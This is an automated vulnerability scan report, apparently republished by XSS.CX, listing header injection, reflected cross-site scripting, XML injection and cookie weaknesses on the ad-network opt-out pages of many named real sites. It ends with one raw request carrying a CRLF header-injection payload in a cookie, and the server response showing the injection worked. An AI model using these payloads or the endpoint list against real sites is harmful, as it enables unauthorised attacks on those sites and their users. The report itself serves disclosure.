XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, nai opt out

Report generated by XSS.CX at Mon Nov 14 13:46:02 CST 2011.

Loading



1. HTTP header injection

1.1. http://img.pulsemgr.com/optout [p cookie]

1.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]

1.3. http://optout.crwdcntrl.net/optout [ct parameter]

1.4. http://optout.crwdcntrl.net/optout [d parameter]

1.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]

1.6. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

2.2. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

2.3. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

2.4. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

2.5. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

2.6. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

2.7. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]

2.8. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]

2.9. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

2.10. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

2.11. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

2.12. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

2.13. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

2.14. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

2.15. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

2.16. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

2.17. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

2.18. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

2.19. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

2.20. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

2.21. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

2.22. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

2.23. http://advertising.aol.com/token/0/3/1499749799/ [REST URL parameter 1]

2.24. http://advertising.aol.com/token/0/3/1499749799/ [REST URL parameter 1]

2.25. http://advertising.aol.com/token/0/3/1709369489/ [REST URL parameter 1]

2.26. http://advertising.aol.com/token/0/3/1709369489/ [REST URL parameter 1]

2.27. http://advertising.aol.com/token/1/3/1119994994/ [REST URL parameter 1]

2.28. http://advertising.aol.com/token/1/3/1119994994/ [REST URL parameter 1]

2.29. http://advertising.aol.com/token/1/3/174796341/ [REST URL parameter 1]

2.30. http://advertising.aol.com/token/1/3/174796341/ [REST URL parameter 1]

2.31. http://advertising.aol.com/token/2/2/687446498/ [REST URL parameter 1]

2.32. http://advertising.aol.com/token/2/2/687446498/ [REST URL parameter 1]

2.33. http://advertising.aol.com/token/2/3/326991826/ [REST URL parameter 1]

2.34. http://advertising.aol.com/token/2/3/326991826/ [REST URL parameter 1]

2.35. http://advertising.aol.com/token/3/1/194198501/ [REST URL parameter 1]

2.36. http://advertising.aol.com/token/3/1/194198501/ [REST URL parameter 1]

2.37. http://advertising.aol.com/token/3/3/635701302/ [REST URL parameter 1]

2.38. http://advertising.aol.com/token/3/3/635701302/ [REST URL parameter 1]

2.39. http://advertising.aol.com/token/4/1/1230812852/ [REST URL parameter 1]

2.40. http://advertising.aol.com/token/4/1/1230812852/ [REST URL parameter 1]

2.41. http://advertising.aol.com/token/4/3/1034886802/ [REST URL parameter 1]

2.42. http://advertising.aol.com/token/4/3/1034886802/ [REST URL parameter 1]

2.43. http://advertising.aol.com/token/5/1/411946761/ [REST URL parameter 1]

2.44. http://advertising.aol.com/token/5/1/411946761/ [REST URL parameter 1]

2.45. http://advertising.aol.com/token/5/3/687316672/ [REST URL parameter 1]

2.46. http://advertising.aol.com/token/5/3/687316672/ [REST URL parameter 1]

2.47. http://advertising.aol.com/token/6/1/633460859/ [REST URL parameter 1]

2.48. http://advertising.aol.com/token/6/1/633460859/ [REST URL parameter 1]

2.49. http://advertising.aol.com/token/6/3/207984165/ [REST URL parameter 1]

2.50. http://advertising.aol.com/token/6/3/207984165/ [REST URL parameter 1]

2.51. http://advertising.aol.com/token/7/1/1742489720/ [REST URL parameter 1]

2.52. http://advertising.aol.com/token/7/1/1742489720/ [REST URL parameter 1]

2.53. http://advertising.aol.com/token/7/3/882396611/ [REST URL parameter 1]

2.54. http://advertising.aol.com/token/7/3/882396611/ [REST URL parameter 1]

2.55. http://advertising.aol.com/token/8/1/293319859/ [REST URL parameter 1]

2.56. http://advertising.aol.com/token/8/1/293319859/ [REST URL parameter 1]

2.57. http://advertising.aol.com/token/8/3/784172255/ [REST URL parameter 1]

2.58. http://advertising.aol.com/token/8/3/784172255/ [REST URL parameter 1]

2.59. https://console.turn.com/app/account/index.htm [REST URL parameter 2]

2.60. https://console.turn.com/app/account/index.htm [REST URL parameter 2]

2.61. https://console.turn.com/app/account/index.htm [REST URL parameter 3]

2.62. https://console.turn.com/app/account/index.htm [REST URL parameter 3]

2.63. https://console.turn.com/app/account/index.htm [accountName parameter]

2.64. https://console.turn.com/app/account/index.htm [name of an arbitrarily supplied request parameter]

2.65. http://en.wikipedia.org/wiki/Key_performance_indicator [REST URL parameter 2]

2.66. http://en.wikipedia.org/wiki/Key_performance_indicator [REST URL parameter 2]

2.67. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

2.68. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

2.69. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

2.70. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

2.71. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

2.72. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

2.73. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

2.74. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

2.75. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

2.76. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

2.77. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

2.78. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

2.79. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

2.80. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

2.81. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

2.82. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

2.83. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

2.84. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

2.85. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

2.86. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

2.87. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

2.88. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

2.89. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

2.90. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

2.91. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

2.92. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

2.93. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

2.94. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

2.95. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

2.96. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

2.97. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

2.98. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

2.99. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

2.100. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

2.101. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

2.102. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

2.103. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

2.104. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

2.105. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 1]

2.106. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 1]

2.107. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 2]

2.108. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 2]

2.109. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 3]

2.110. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 3]

2.111. http://www.addthis.com/api/nai/status [REST URL parameter 1]

2.112. http://www.addthis.com/api/nai/status [REST URL parameter 1]

2.113. http://www.addthis.com/api/nai/status [REST URL parameter 2]

2.114. http://www.addthis.com/api/nai/status [REST URL parameter 2]

2.115. http://www.addthis.com/api/nai/status [REST URL parameter 3]

2.116. http://www.addthis.com/api/nai/status [REST URL parameter 3]

2.117. http://www.networkadvertising.org/managing/opt_out_intl.asp [lang parameter]

2.118. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]

2.119. http://www.tribalfusion.com/test/opt.js [REST URL parameter 2]

2.120. http://www.tribalfusion.com/test/opt.js [REST URL parameter 2]

2.121. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]

2.122. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]

2.123. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]

2.124. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]

2.125. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]

2.126. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]

2.127. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]

2.128. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]

2.129. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]

2.130. http://open.ad.yieldmanager.net/V1/NWSetter [url parameter]

3. XML injection

3.1. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]

3.2. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]

3.3. http://pixel.adblade.com/optoutnai.php [REST URL parameter 1]

3.4. http://s.ytimg.com/yt/swfbin/cps-vflHPStfQ.swf [REST URL parameter 2]

3.5. http://s.ytimg.com/yt/swfbin/cps-vflHPStfQ.swf [REST URL parameter 3]

3.6. http://www.nexac.com/nai_optout.php [REST URL parameter 1]

3.7. http://www.nexac.com/nai_status.php [REST URL parameter 1]

3.8. http://www.nexac.com/nai_verify.php [REST URL parameter 1]

4. Session token in URL

4.1. http://advertising.aol.com/nai/nai.php

4.2. http://info.yahoo.com/nai/optout.html

4.3. http://nai.ad.us-ec.adtechus.com/nai/daa.php

4.4. http://nai.adserver.adtechus.com/nai/daa.php

4.5. http://nai.adserverec.adtechus.com/nai/daa.php

4.6. http://nai.adserverwc.adtechus.com/nai/daa.php

4.7. http://nai.adsonar.com/nai/daa.php

4.8. http://nai.adtech.de/nai/daa.php

4.9. http://nai.advertising.com/nai/daa.php

4.10. http://nai.glb.adtechus.com/nai/daa.php

4.11. http://nai.tacoda.at.atwola.com/nai/daa.php

4.12. http://www.networkadvertising.org/managing/optout_results.asp

4.13. http://www.networkadvertising.org/yahoo_handler

5. Cookie scoped to parent domain

5.1. http://optout.b3-uk.mookie1.com/optout/nai/

5.2. http://optout.b3.mookie1.com/optout/nai/

5.3. http://optout.ib.mookie1.com/optout/nai/

5.4. http://optout.mookie1.com/optout/nai/

5.5. http://www.opensource.org/licenses/mit-license.php

5.6. http://api.aggregateknowledge.com/optout

5.7. http://api.aggregateknowledge.com/optout2

5.8. http://api.agkn.com/optout2

5.9. http://ats.tumri.net/ats/optout

5.10. https://console.turn.com/include/formAction.htm

5.11. http://developer.yahoo.net/yui/license.txt

5.12. http://img.pulsemgr.com/optout

5.13. http://info.yahoo.com/nai/optout.html

5.14. http://load.exelator.com/load/OptOut.php

5.15. http://nai.ad.us-ec.adtechus.com/nai/daa.php

5.16. http://nai.adserver.adtechus.com/nai/daa.php

5.17. http://nai.adserverec.adtechus.com/nai/daa.php

5.18. http://nai.adserverwc.adtechus.com/nai/daa.php

5.19. http://nai.adsonar.com/nai/daa.php

5.20. http://nai.adtech.de/nai/daa.php

5.21. http://nai.advertising.com/nai/daa.php

5.22. http://nai.glb.adtechus.com/nai/daa.php

5.23. http://nai.tacoda.at.atwola.com/nai/daa.php

5.24. http://notrack.adviva.net/CookieCheck.php

5.25. http://notrack.specificmedia.com/CookieCheck.php

5.26. http://oo.afy11.net/NAIOptOut.aspx

5.27. http://open.ad.yieldmanager.net/V1/NWSetter

5.28. http://optout.33across.com/api/

5.29. http://optout.adlegend.com/nai/optout.php

5.30. http://optout.crwdcntrl.net/optout

5.31. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

5.32. http://optout.imiclk.com/cgi/optout.cgi

5.33. http://optout.mookie1.decdna.net/optout/nai/

5.34. http://optout.mookie1.decideinteractive.com/optout/nai/

5.35. http://optout.mookie1.dtfssearch.com/optout/nai/

5.36. http://optout.mookie1.pm14.com/optout/nai/

5.37. http://optout.mxptint.net/naioptout.ashx

5.38. http://optout.xgraph.net/optout.gif.jsp

5.39. http://p.brilig.com/contact/optout

5.40. http://pbid.pro-market.net/engine

5.41. http://pixel.adblade.com/optoutnai.php

5.42. http://pixel.fetchback.com/serve/fb/optout

5.43. http://privacy.revsci.net/optout/optout.aspx

5.44. http://px.owneriq.net/naioptout

5.45. http://rp.gwallet.com/r1/optout

5.46. http://rt.legolas-media.com/lgrt

5.47. http://s.xp1.ru4.com/coop

5.48. http://www.adbrite.com/mb/nai_optout.php

5.49. http://www.addthis.com/api/nai/optout

5.50. http://www.bizographics.com/nai/optout

5.51. http://www.burstnet.com/cgi-bin/opt_out.cgi

5.52. http://www.facebook.com/TurnInc

5.53. http://www.facebook.com/sharer.php

5.54. http://www.mediaplex.com/optout_pure.php

5.55. http://www.mediaplex.com/optout_pure.php

5.56. http://www.nexac.com/nai_optout.php

6. Cookie without HttpOnly flag set

6.1. http://nai.ad.us-ec.adtechus.com/nai/daa.php

6.2. http://nai.adserver.adtechus.com/nai/daa.php

6.3. http://nai.adserverec.adtechus.com/nai/daa.php

6.4. http://nai.adserverwc.adtechus.com/nai/daa.php

6.5. http://nai.adsonar.com/nai/daa.php

6.6. http://nai.adtech.de/nai/daa.php

6.7. http://nai.advertising.com/nai/daa.php

6.8. http://nai.glb.adtechus.com/nai/daa.php

6.9. http://nai.tacoda.at.atwola.com/nai/daa.php

6.10. http://optout.b3-uk.mookie1.com/optout/nai/

6.11. http://optout.b3.mookie1.com/optout/nai/

6.12. http://optout.ib.mookie1.com/optout/nai/

6.13. http://optout.mookie1.com/optout/nai/

6.14. http://tag.admeld.com/nai-opt-out

6.15. http://www.naiblog.org/

6.16. http://www.opensource.org/licenses/mit-license.php

6.17. http://api.aggregateknowledge.com/optout

6.18. http://api.aggregateknowledge.com/optout2

6.19. http://api.agkn.com/optout2

6.20. http://ats.tumri.net/ats/optout

6.21. https://console.turn.com/include/formAction.htm

6.22. http://developer.yahoo.net/yui/license.txt

6.23. http://domdex.com/nai_optout.php

6.24. http://img.pulsemgr.com/optout

6.25. http://info.yahoo.com/nai/optout.html

6.26. http://load.exelator.com/load/OptOut.php

6.27. http://login.dotomi.com/favicon.ico

6.28. http://nai.ad.us-ec.adtechus.com/nai/daa.php

6.29. http://nai.adserver.adtechus.com/nai/daa.php

6.30. http://nai.adserverec.adtechus.com/nai/daa.php

6.31. http://nai.adserverwc.adtechus.com/nai/daa.php

6.32. http://nai.adsonar.com/nai/daa.php

6.33. http://nai.adtech.de/nai/daa.php

6.34. http://nai.advertising.com/nai/daa.php

6.35. http://nai.glb.adtechus.com/nai/daa.php

6.36. http://nai.tacoda.at.atwola.com/nai/daa.php

6.37. http://notrack.adviva.net/CookieCheck.php

6.38. http://notrack.specificmedia.com/CookieCheck.php

6.39. http://oo.afy11.net/NAIOptOut.aspx

6.40. http://open.ad.yieldmanager.net/V1/NWSetter

6.41. http://optout.33across.com/api/

6.42. http://optout.adlegend.com/nai/optout.php

6.43. http://optout.crwdcntrl.net/optout

6.44. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

6.45. http://optout.imiclk.com/cgi/optout.cgi

6.46. http://optout.mookie1.decdna.net/optout/nai/

6.47. http://optout.mookie1.decideinteractive.com/optout/nai/

6.48. http://optout.mookie1.dtfssearch.com/optout/nai/

6.49. http://optout.mookie1.pm14.com/optout/nai/

6.50. http://optout.mxptint.net/naioptout.ashx

6.51. http://optout.xgraph.net/optout.gif.jsp

6.52. http://p.brilig.com/contact/optout

6.53. http://pbid.pro-market.net/engine

6.54. http://pixel.adblade.com/optoutnai.php

6.55. http://pixel.fetchback.com/serve/fb/optout

6.56. http://privacy.revsci.net/optout/optout.aspx

6.57. http://px.owneriq.net/naioptout

6.58. http://rp.gwallet.com/r1/optout

6.59. http://rt.legolas-media.com/lgrt

6.60. http://s.xp1.ru4.com/coop

6.61. http://t5.trackalyzer.com/trackalyze.asp

6.62. http://tag.admeld.com/nai-status

6.63. http://tag.admeld.com/nai-test-opt-out

6.64. http://www.adbrite.com/mb/nai_optout.php

6.65. http://www.addthis.com/api/nai/optout

6.66. http://www.adexchanger.com/the-state-of/turn/

6.67. http://www.bizographics.com/nai/optout

6.68. http://www.burstnet.com/cgi-bin/opt_out.cgi

6.69. http://www.facebook.com/TurnInc

6.70. http://www.mediaplex.com/optout_pure.php

6.71. http://www.mediaplex.com/optout_pure.php

6.72. http://www.nexac.com/nai_optout.php

7. Password field with autocomplete enabled

7.1. https://console.turn.com/app/account/index.htm

7.2. https://console.turn.com/login/login.htm

7.3. http://www.facebook.com/TurnInc

8. Referer-dependent response

8.1. http://ats.tumri.net/ats/optout

8.2. http://optout.collective-media.net/optout/status

9. Cross-domain POST

9.1. http://flex.madebymufffin.com/

9.2. http://gsgd.co.uk/sandbox/jquery/easing/

9.3. http://www.adexchanger.com/the-state-of/turn/

9.4. http://www.adexchanger.com/the-state-of/turn/

10. SSL cookie without secure flag set

11. Cross-domain Referer leakage

11.1. http://advertising.aol.com/nai/nai.php

11.2. http://advertising.aol.com/nai/nai.php

11.3. http://advertising.aol.com/nai/nai.php

11.4. http://advertising.aol.com/nai/nai.php

11.5. http://advertising.aol.com/nai/nai.php

11.6. http://advertising.aol.com/nai/nai.php

11.7. http://akamai.interclickproxy.com/aclrc.aspx

11.8. http://as.serving-sys.com/OptOut/nai_optout.aspx

11.9. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

11.10. http://choice.atdmt.com/AdvertisementChoice/opt.out

11.11. http://choice.atdmt.com/AdvertisementChoice/opt.out

11.12. http://choice.atdmt.com/AdvertisementChoice/opt.out

11.13. http://choice.bing.com/AdvertisementChoice/opt.out

11.14. http://choice.bing.com/AdvertisementChoice/opt.out

11.15. http://choice.bing.com/AdvertisementChoice/opt.out

11.16. http://choice.live.com/AdvertisementChoice/opt.out

11.17. http://choice.live.com/AdvertisementChoice/opt.out

11.18. http://choice.live.com/AdvertisementChoice/opt.out

11.19. http://choice.microsoft.com/AdvertisementChoice/opt.out

11.20. http://choice.microsoft.com/AdvertisementChoice/opt.out

11.21. http://choice.msn.com/AdvertisementChoice/opt.out

11.22. http://choice.msn.com/AdvertisementChoice/opt.out

11.23. http://choice.msn.com/AdvertisementChoice/opt.out

11.24. http://dis.criteo.com/dis/optoutstatus.aspx

11.25. http://dis.criteo.com/dis/optoutstatus.aspx

11.26. http://edge.aperture.displaymarketplace.com/anotnai.gif

11.27. http://edge.aperture.displaymarketplace.com/anotnaistat.gif

11.28. http://img.pulsemgr.com/optout

11.29. http://img.pulsemgr.com/optout

11.30. http://media.fastclick.net/nai/remove

11.31. http://media.fastclick.net/nai/verify

11.32. http://oi.vresp.com/

11.33. http://oo.afy11.net/NAIIsOptOut.aspx

11.34. http://open.ad.yieldmanager.net/V1/NWSetter

11.35. http://optout.da.channelintelligence.com/nai/optoutstatus.aspx

11.36. http://optout.da.channelintelligence.com/nai/optoutstatus.aspx

11.37. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

11.38. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

11.39. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx

11.40. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx

11.41. http://optout.mxptint.net/naistatus.ashx

11.42. http://optout.mxptint.net/naistatus.ashx

11.43. http://r.turn.com/r/optout

11.44. http://tag.admeld.com/nai-status

11.45. http://www.mathtag.com/cgi-bin/optout

11.46. http://www.mathtag.com/cgi-bin/optout

11.47. http://www.networkadvertising.org/managing/opt_out_intl.asp

11.48. http://www.networkadvertising.org/yahoo_handler

11.49. http://www.pulse360.com/behavior/nai-opt-out.html

11.50. http://www.pulse360.com/behavior/nai-opt-out.html

11.51. http://www.tidaltv.com/optout/status.ashx

11.52. http://www.tidaltv.com/optout/status.ashx

11.53. http://www.tidaltv.com/optout/verfiyoptout.ashx

11.54. http://www.tribalfusion.com/optout/verify.js

12. Cross-domain script include

12.1. http://api.aggregateknowledge.com/optout

12.2. http://en.wikipedia.org/wiki/Key_performance_indicator

12.3. http://flex.madebymufffin.com/

12.4. http://gsgd.co.uk/sandbox/jquery/easing/

12.5. http://jquery.com/

12.6. http://www.adexchanger.com/the-state-of/turn/

12.7. http://www.allaboutcookies.org/cookies/

12.8. http://www.beechertrouble.com/

12.9. http://www.blastpr.com/

12.10. http://www.facebook.com/TurnInc

12.11. http://www.networkadvertising.org/

12.12. http://www.networkadvertising.org/about/

12.13. http://www.networkadvertising.org/about/legal.asp

12.14. http://www.networkadvertising.org/about/privacy.asp

12.15. http://www.networkadvertising.org/contact/

12.16. http://www.networkadvertising.org/index.asp

12.17. http://www.networkadvertising.org/managing/

12.18. http://www.networkadvertising.org/managing/enforcement.asp

12.19. http://www.networkadvertising.org/managing/faqs.asp

12.20. http://www.networkadvertising.org/managing/index.asp

12.21. http://www.networkadvertising.org/managing/learn_more.asp

12.22. http://www.networkadvertising.org/managing/opt_out.asp

12.23. http://www.networkadvertising.org/managing/opt_out.asp

12.24. http://www.networkadvertising.org/managing/opt_out.asp

12.25. http://www.networkadvertising.org/managing/opt_out.asp

12.26. http://www.networkadvertising.org/managing/opt_out_intl.asp

12.27. http://www.networkadvertising.org/managing/opt_out_intl.asp

12.28. http://www.networkadvertising.org/managing/optout_problems.asp

12.29. http://www.networkadvertising.org/managing/optout_results.asp

12.30. http://www.networkadvertising.org/managing/principles.asp

12.31. http://www.networkadvertising.org/networks/

12.32. http://www.networkadvertising.org/participating/

12.33. http://www.opensource.org/licenses/mit-license.php

12.34. http://www.quantcast.com/how-we-do-it/consumer-choice/opt-out

13. Email addresses disclosed

13.1. http://advertising.aol.com/finish/0/4/1/

13.2. http://advertising.aol.com/finish/1/4/1/

13.3. http://advertising.aol.com/finish/2/4/1/

13.4. http://advertising.aol.com/finish/3/4/1/

13.5. http://advertising.aol.com/finish/4/4/1/

13.6. http://advertising.aol.com/finish/5/4/1/

13.7. http://advertising.aol.com/finish/6/4/1/

13.8. http://advertising.aol.com/finish/7/4/1/

13.9. http://advertising.aol.com/finish/8/4/1/

13.10. http://advertising.aol.com/token/0/3/1499749799/

13.11. http://advertising.aol.com/token/0/3/1709369489/

13.12. http://advertising.aol.com/token/1/3/1119994994/

13.13. http://advertising.aol.com/token/1/3/174796341/

13.14. http://advertising.aol.com/token/2/2/687446498/

13.15. http://advertising.aol.com/token/2/3/326991826/

13.16. http://advertising.aol.com/token/3/1/194198501/

13.17. http://advertising.aol.com/token/3/3/635701302/

13.18. http://advertising.aol.com/token/4/1/1230812852/

13.19. http://advertising.aol.com/token/4/3/1034886802/

13.20. http://advertising.aol.com/token/5/1/411946761/

13.21. http://advertising.aol.com/token/5/3/687316672/

13.22. http://advertising.aol.com/token/6/1/633460859/

13.23. http://advertising.aol.com/token/6/3/207984165/

13.24. http://advertising.aol.com/token/7/1/1742489720/

13.25. http://advertising.aol.com/token/7/3/882396611/

13.26. http://advertising.aol.com/token/8/1/293319859/

13.27. http://advertising.aol.com/token/8/3/784172255/

13.28. http://gsgd.co.uk/sandbox/jquery/easing/

13.29. http://www.beechertrouble.com/

13.30. http://www.google.com/calendar/feeds/sslnoff1uokr6dr7sbc2leg0gc@group.calendar.google.com/public/basic

13.31. http://www.networkadvertising.org/contact/

13.32. http://www.networkadvertising.org/managing/learn_more.asp

13.33. http://www.opensource.org/licenses/mit-license.php

14. Private IP addresses disclosed

14.1. http://www.facebook.com/TurnInc

14.2. http://www.facebook.com/sharer.php

14.3. http://www.facebook.com/sharer.php

15. Robots.txt file

15.1. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYzYYEIOCGBCoGUgMBAP9_MgVNAwEAHw

15.2. http://safebrowsing.clients.google.com/safebrowsing/downloads

15.3. http://www.google-analytics.com/__utm.gif

16. Cacheable HTTPS response

16.1. https://login.dotomi.com/ucm

16.2. https://www.salesforce.com/servlet/servlet.WebToLead

17. HTML does not specify charset

17.1. http://advertising.aol.com/nai/nai.php

17.2. http://optout.collective-media.net/optout

17.3. http://optout.collective-media.net/optout/status

17.4. http://pbid.pro-market.net/engine

17.5. http://www.networkadvertising.org/

17.6. http://www.networkadvertising.org/about/

17.7. http://www.networkadvertising.org/about/privacy.asp

17.8. http://www.networkadvertising.org/contact/

17.9. http://www.networkadvertising.org/index.asp

17.10. http://www.networkadvertising.org/managing/

17.11. http://www.networkadvertising.org/managing/enforcement.asp

17.12. http://www.networkadvertising.org/managing/faqs.asp

17.13. http://www.networkadvertising.org/managing/index.asp

17.14. http://www.networkadvertising.org/managing/learn_more.asp

17.15. http://www.networkadvertising.org/managing/opt_out.asp

17.16. http://www.networkadvertising.org/managing/optout_problems.asp

17.17. http://www.networkadvertising.org/managing/optout_results.asp

17.18. http://www.networkadvertising.org/managing/principles.asp

17.19. http://www.networkadvertising.org/networks/

17.20. http://www.networkadvertising.org/participating/

17.21. http://www.tribalfusion.com/test/opt.js

18. HTML uses unrecognised charset

19. Content type incorrectly stated

19.1. http://info.yahoo.com/nai/optout.html

19.2. http://optout.b3-uk.mookie1.com/optout/nai/

19.3. http://optout.b3.mookie1.com/optout/nai/

19.4. http://optout.ib.mookie1.com/optout/nai/

19.5. http://optout.mookie1.com/optout/nai/

19.6. http://optout.mookie1.com/optout/nai/index.php

19.7. http://optout.mookie1.decdna.net/optout/nai/

19.8. http://optout.mookie1.decideinteractive.com/optout/nai/

19.9. http://optout.mookie1.dtfssearch.com/optout/nai/

19.10. http://optout.mookie1.pm14.com/optout/nai/

19.11. http://www.crosspixel.net/optout_nai.php

19.12. http://www.tribalfusion.com/test/opt.js

20. Content type is not specified

20.1. http://ats.tumri.net/ats/optoutcheck

20.2. http://ats.tumri.net/ats/optoutstatus

20.3. https://console.turn.com/corp/favicon.ico



1. HTTP header injection  next
There are 6 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://img.pulsemgr.com/optout [p cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The value of the p cookie is copied into the Location response header. The payload d2dec%0d%0afcebb661513 was submitted in the p cookie. This caused a response containing an injected HTTP header.

Request

GET /optout?optout&nocache=0.3251545 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=d2dec%0d%0afcebb661513; c=1

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
